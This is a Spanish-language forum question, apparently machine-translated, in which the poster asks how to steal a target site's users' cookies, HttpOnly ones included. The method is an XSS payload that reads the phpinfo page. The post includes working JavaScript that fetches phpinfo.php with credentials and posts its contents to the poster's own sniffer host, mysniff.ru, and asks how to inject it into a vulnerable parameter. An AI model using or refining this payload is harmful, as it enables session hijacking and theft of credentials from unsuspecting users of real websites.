phpinfo () muestra todas las cookies, incluso las httponly. Entonces, la pregunta es: ¿cómo puedo recibir cocineros de los usuarios en el sitio web de destino a través de xss con phpinfo? El xss contendrá código que abrirá la página phpinfo en segundo plano (como un popunder) y luego, utilizando xhtmlRequest enviará el contenido de la página a mi página web sniffer. La pregunta es: no estoy realmente caliente para poner esto juntos. Lo estoy viendo de esta manera:
- xss contendrá
- evil.js abrirá xhtmlRequest GET para obtener la página de phpinfo con datos de cookies
- evil.js publicará datos en mi sniffer
¿Es esta la forma correcta de hacer esto o quizás hay un enfoque más apropiado? ¡Gracias!
UPD: escribí un ejemplo,
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
var body = encodeURIComponent(xhttp.responseText);
xhttp.open("POST", 'http://mysniff.ru/t.php', true)
xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xhttp.send(body)
}
};
xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();
¿Funcionará si incluyo este código como script src? ¿O solo debo urlencodificarlo y pasarlo a un parámetro vulnerable para que funcione?